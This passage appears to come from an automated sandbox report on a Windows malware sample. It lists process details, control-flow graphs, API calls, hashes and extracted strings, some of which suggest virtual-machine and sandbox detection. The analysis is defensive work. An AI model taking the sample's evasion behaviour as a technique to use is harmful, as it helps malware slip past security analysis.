                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 816
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Section Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Process Activities

                  Show Windows behavior

                  Thread Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Windows UI Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  Disassembly

                  Execution Graph

                  Execution Coverage

                  Dynamic/Packed Code Coverage

                  Signature Coverage

                  Execution Coverage:0.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:13
                  Total number of Limit Nodes:1
                  Show Legend
                  Hide Nodes/Edges
                  execution_graph 12508 3126b0d 12517 3121131 12508->12517 12510 3126b29 CreateFileW 12511 3126b47 12510->12511 12516 3126b9a 12510->12516 12512 3121131 LoadLibraryA 12511->12512 12513 3126b59 12512->12513 12514 3121131 LoadLibraryA 12513->12514 12515 3126b70 CloseHandle 12514->12515 12515->12516 12518 312116b 12517->12518 12519 312115c 12517->12519 12518->12510 12519->12518 12520 31211e3 LoadLibraryA 12519->12520 12521 3121200 12520->12521 12521->12510 12521->12518

                  Executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 71 3126b0d-3126b45 call 3121131 CreateFileW 74 3126b47-3126b98 call 3121131 * 2 CloseHandle 71->74 75 3126ba8 71->75 74->75 81 3126b9a-3126ba0 74->81 81->75
                  APIs
                  • CreateFileW.KERNELBASE(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03126B40
                    • Part of subcall function 03121131: LoadLibraryA.KERNEL32(NTDLL,?), ref: 031211F9
                  • CloseHandle.KERNELBASE(00000000), ref: 03126B71
                  Strings
                  • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, xrefs: 03126B3B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandleLibraryLoad
                  • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  • API String ID: 2506845977-210220030
                  • Opcode ID: dede261e609b68da2b26da8cd33a9daf05d0b196f5f942b8f0ad69fcd8326a1d
                  • Instruction ID: 37324268fbe5a9855a30746aa99fef1a9f0eca76dcdd4c3fe466821e40ebc3a8
                  • Opcode Fuzzy Hash: dede261e609b68da2b26da8cd33a9daf05d0b196f5f942b8f0ad69fcd8326a1d
                  • Instruction Fuzzy Hash: C201FC357142156FEB19EB78CC82F2CBB90AB89314F298224F024EF0E8CFB0E4608704

                  Non-executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 175 3121f6c-3121f84 176 3121f8f-3121fa8 175->176 177 3121f8a call 3121131 175->177 179 3121faa-3121fb0 176->179 180 3121fb8-3121fc2 176->180 177->176 179->180 181 3121fd2-3121fe2 180->181 182 3121fc4-3121fca 180->182 183 3121fe4-3121fea 181->183 184 3121ffa-3122004 181->184 182->181 183->184 185 3121fec-3121ff2 183->185 186 3122006-312200c 184->186 187 3122014-3122020 call 31262c7 184->187 185->184 186->187 190 3122022-3122028 187->190 191 3122030-312203c call 31262c7 187->191 190->191 194 312203e-3122044 191->194 195 312204c-3122059 191->195 194->195 196 312205b-3122061 195->196 197 3122079-312207f 195->197 196->197 198 3122063-3122069 196->198 199 3122081-3122087 197->199 200 3122097-31220a3 call 31262c7 197->200 198->197 201 312206b-3122071 198->201 199->200 202 3122089-312208f 199->202 205 31220b3-31220bf call 31262c7 200->205 206 31220a5-31220ab 200->206 201->197 202->200 209 31220c1-31220c7 205->209 210 31220cf-31220db call 31262c7 205->210 206->205 209->210 213 31220eb-31220f7 call 31262c7 210->213 214 31220dd-31220e3 210->214 217 3122107-3122113 call 31262c7 213->217 218 31220f9-31220ff 213->218 214->213 221 3122123-312212f call 3121227 217->221 222 3122115-312211b 217->222 218->217 225 3122131-3122137 221->225 226 312213f-3122156 221->226 222->221 225->226 227 31221f5-31221f8 226->227 228 312215c-312216d 226->228 228->227 230 3122173-312217d 228->230 231 3122187-312219e 230->231 233 31221a2-31221bc 231->233 234 31221a0 231->234 238 31221be-31221c3 233->238 239 31221cc 233->239 235 31221de-31221e5 234->235 235->227 236 31221e7-31221ed 235->236 236->227 238->239 240 31221c5-31221ca 238->240 241 31221d6-31221dc 239->241 240->239 240->241 241->231 241->235
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID: Basi$Micr$Para$RDPU$VMwa$VMwa$llel$reVM$t Hv$ware
                  • API String ID: 0-710289715
                  • Opcode ID: 74239c9c7b16b21aa04fe377b8163202acf5c4f4e685acb1310240db984c9c11
                  • Instruction ID: 509de4b8d48431b865364dba47db2c85c3d25dd11c930f3e9988108927cbe621
                  • Opcode Fuzzy Hash: 74239c9c7b16b21aa04fe377b8163202acf5c4f4e685acb1310240db984c9c11
                  • Instruction Fuzzy Hash: DA51A378701219EFDB59EB90C884F9DBB75BF4C701F5846A0E6048A1C9C770E9D2CBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID: header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
                  • API String ID: 0-3633268661
                  • Opcode ID: 51fb4cac4f8a2bf5199512ce453f2594e57f0f9f11454ea1ed87b5b995060f26
                  • Instruction ID: 4905a8195449975b717ce8279f5a347b3e812b6776b5c20238d35b2f74f1d73f
                  • Opcode Fuzzy Hash: 51fb4cac4f8a2bf5199512ce453f2594e57f0f9f11454ea1ed87b5b995060f26
                  • Instruction Fuzzy Hash: 9A626AB1E00215AFDB14DF59C9846ADFBF5BF4A304F2881A9D818AB352D735DA43CB90
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bb14d30d809129b8e6f0c0766e2083740a43fad8b7dc4135de1c2b7f3338b818
                  • Instruction ID: cc6a4f4365fa0118a0f333da762e27c2e69996be6159ec633c17db3b0652e44d
                  • Opcode Fuzzy Hash: bb14d30d809129b8e6f0c0766e2083740a43fad8b7dc4135de1c2b7f3338b818
                  • Instruction Fuzzy Hash: 2242A075E00229ABDF14DFA9D8407AEFFB5FF0C324F184569E814A7291E735A9708B90
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24f1b031a1f8a5deda89d9838ca26a94a794960f85ee8a27e340a26a4ab77aa1
                  • Instruction ID: 9a53ddbcef7e6bda6de13a5a58b9c094612c1ec31438d9a50e2250270e44bcd3
                  • Opcode Fuzzy Hash: 24f1b031a1f8a5deda89d9838ca26a94a794960f85ee8a27e340a26a4ab77aa1
                  • Instruction Fuzzy Hash: D6F16D756092118FC709CF18D4D48F5BBF1AFA9310B1E82FDD8899B3A6D731A984CB51
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8681bb88b3dbfabbd9febf9af9750538cc47532cf12b7307584a6e9c956e49b
                  • Instruction ID: a1de919cfd60ed8fbe04bb06432b6339b7134b4dc87a568607f7ad8a4acc0ce2
                  • Opcode Fuzzy Hash: d8681bb88b3dbfabbd9febf9af9750538cc47532cf12b7307584a6e9c956e49b
                  • Instruction Fuzzy Hash: 42C1A5359002658FDF4CEE6EEC9447A7BB1EF8D301749815ADA4197289C338E667CBB0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2cacf490f58bdf4ff4af670fc3285697853514b0ee765931d00c2210ba863a8e
                  • Instruction ID: 7d5e1b6940b28f60b3b7fdbb10de6875c251aadd18da5a569cb2726492d7443b
                  • Opcode Fuzzy Hash: 2cacf490f58bdf4ff4af670fc3285697853514b0ee765931d00c2210ba863a8e
                  • Instruction Fuzzy Hash: 356178B1A042216BE311DB38CC40F2F7F95EFCC704F5A8868F949AB785D775D95286A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 38feda19dea376615d46f663bf178bd2f5c1e6b063b145903f0926c12bc5be2c
                  • Instruction ID: 74bbc5395a3bc7db06c6b02a3e914d72712a0c64c0b740e2ae298e007aec73a6
                  • Opcode Fuzzy Hash: 38feda19dea376615d46f663bf178bd2f5c1e6b063b145903f0926c12bc5be2c
                  • Instruction Fuzzy Hash: 82414FB5A00118BBEB14DB64CC91FFF73B9EB88704F45C558F909AE284D775AA008B90
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 379fc15f2efd7c83f3ea997dea8cf81268e51f57da66e69fcc6c16648a54e29c
                  • Instruction ID: 2f41fc0b828027829d1b4feee8bb81bae4c1465a1f0d83360b0f13b4d7ce371f
                  • Opcode Fuzzy Hash: 379fc15f2efd7c83f3ea997dea8cf81268e51f57da66e69fcc6c16648a54e29c
                  • Instruction Fuzzy Hash: 0241D37EA04321AFD725EF25EC05B043FA5EB5C311F168134F998AB269E77488B08B50
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 1debfe5b67dfbccc68180ed0c1c310f024af668c72bc5b37cc79b25b771ed206
                  • Instruction ID: 4807d12afa92169da0483869520ad77bbd5ac2904978a03134351d5ce0653bcd
                  • Opcode Fuzzy Hash: 1debfe5b67dfbccc68180ed0c1c310f024af668c72bc5b37cc79b25b771ed206
                  • Instruction Fuzzy Hash: D441047AA44321AFDB24EF35DD45B083F61EB5D311F268130F998AB26DE734C8A18B50
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b6ad26908321792fdce15bb5755181406fccfd7b79d24d59f7413ac628f0f1f
                  • Instruction ID: efc13a9d3d049a7e6e8cfe19d85b54c4c15439c1b2e432c1615113562468936a
                  • Opcode Fuzzy Hash: 2b6ad26908321792fdce15bb5755181406fccfd7b79d24d59f7413ac628f0f1f
                  • Instruction Fuzzy Hash: 75F0E276A40129ABC724DE11E480943FBBAFBCC260725C971E808C7300D330E8E285D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3150000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cbef14523ffd5c8bf50e7df617c3a508bcdc59d766f3cace1eef0a9913c200fd
                  • Instruction ID: c39455965e39bb008fe71b0de837b44fdb15334f219daad0d92a6487e392a706
                  • Opcode Fuzzy Hash: cbef14523ffd5c8bf50e7df617c3a508bcdc59d766f3cace1eef0a9913c200fd
                  • Instruction Fuzzy Hash: 0BF02731509642CFDB0BEB54C0647E5B7E2EBBD300FBA4112E59A4B300EB308455CB84
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3747b216bb7640c08f949b015196ec800bea75b710efc7667a09099d45f6f0fe
                  • Instruction ID: fac49365386c4e0fd3d59bcad7678eb6b979ae015019be6ac397fb2d74529ff3
                  • Opcode Fuzzy Hash: 3747b216bb7640c08f949b015196ec800bea75b710efc7667a09099d45f6f0fe
                  • Instruction Fuzzy Hash: 90F0A077A406198BD774CA11D480A0BF79AB7DCB60F56D561C9081BF05C730E9E3CAD4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e682d07938a08791fb2b67f5b230261ac76ddf3e9efffd87a8a2196e06f52ada
                  • Instruction ID: c689b21c46f4011354dd013a71d2242310ba35e9aea8850cd7642e100e684976
                  • Opcode Fuzzy Hash: e682d07938a08791fb2b67f5b230261ac76ddf3e9efffd87a8a2196e06f52ada
                  • Instruction Fuzzy Hash: B7E0657AA45225CBC719DF84E480982FB29FB98360B0186A6CD041B70AC370F8E1CBE0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 26b5c9e30651effefad06b6a61ea62ac712189e8604cc9d6c86c9b3b428bb2f3
                  • Instruction ID: 396ebaa129f8580f844dd736e4d2a09fa5e4cc6d5646942b6a20475de7fce619
                  • Opcode Fuzzy Hash: 26b5c9e30651effefad06b6a61ea62ac712189e8604cc9d6c86c9b3b428bb2f3
                  • Instruction Fuzzy Hash: 06D095392A0A08CFC284CB08D0C8E40B3F8FB0DA20B058091EA0A8BB32C331FE10CA40
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5ee6afa41f50251ab5523c54f911ab0a0442e52726d758642362df491cb9a24c
                  • Instruction ID: 3d00263cc3c81bd0d858b1f0f7bc3eabb4e79907c484f053a257082e3ccc3750
                  • Opcode Fuzzy Hash: 5ee6afa41f50251ab5523c54f911ab0a0442e52726d758642362df491cb9a24c
                  • Instruction Fuzzy Hash: 5CD0A736B415288BC315CE44D440D43F729FB487A0B0283A2CC0057706D230E850C6D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                  • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                  • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                  • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

                  Control-flow Graph

                  APIs
                  • lstrcpyW.KERNEL32(0314C4EF,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe), ref: 03123C51
                  • lstrcpyW.KERNEL32(0314C6FB,03144FB5), ref: 03123C61
                  • lstrcpyW.KERNEL32(0314C72B,031454B5), ref: 03123C71
                  • lstrlenW.KERNEL32(031454B5), ref: 03123C7C
                  • lstrcpyW.KERNEL32(0314C933,031432CC,03146F9E,031432CC), ref: 03123CA8
                  • lstrcpy.KERNEL32(0314C993,03146F9E), ref: 03123CB8
                  Strings
                  • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, xrefs: 03123C47
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  • API String ID: 367037083-210220030
                  • Opcode ID: edf4c10db06244e39ff5c017d27920f634205165b951dec17d65069747d2f163
                  • Instruction ID: 53046993fa7bca8af692352fd939652f4fea8d022a41d3f8cff851325e442ec0
                  • Opcode Fuzzy Hash: edf4c10db06244e39ff5c017d27920f634205165b951dec17d65069747d2f163
                  • Instruction Fuzzy Hash: 8C012C79381B957FD620F7F09D0BE8E79906B1DB03F44080476B6A9147DBE4A02146A2

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(?,33656C4F,00000032,00004E20), ref: 03124124
                  • LoadLibraryA.KERNEL32(?,6C656853,2E32336C,006C6C64,?,72436F43,65746165,74736E49,65636E61,00000000,?,6E496F43,61697469,657A696C,00000000,33656C4F), ref: 031241C2
                    • Part of subcall function 03121131: LoadLibraryA.KERNEL32(NTDLL,?), ref: 031211F9
                  • LoadLibraryA.KERNEL32(?,776C6873,2E697061,006C6C64,?,6C656853,2E32336C,006C6C64,?,72436F43,65746165,74736E49,65636E61,00000000,?,6E496F43), ref: 03124243
                  Strings
                  • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, xrefs: 03124220
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  • API String ID: 1029625771-210220030
                  • Opcode ID: c02a03c45145dd33c08bc10dff3c6d4b1008fda1d8ac48d2229995f3b9ea7875
                  • Instruction ID: a7b414776f3782303df141edb178a67aeec5dc455c5adeeb383e1334dfdb4c66
                  • Opcode Fuzzy Hash: c02a03c45145dd33c08bc10dff3c6d4b1008fda1d8ac48d2229995f3b9ea7875
                  • Instruction Fuzzy Hash: 0241B038288301BFEA05FB75EC85F1E3F21BB0CB12F10C120F984A9599DFB1D5A08A65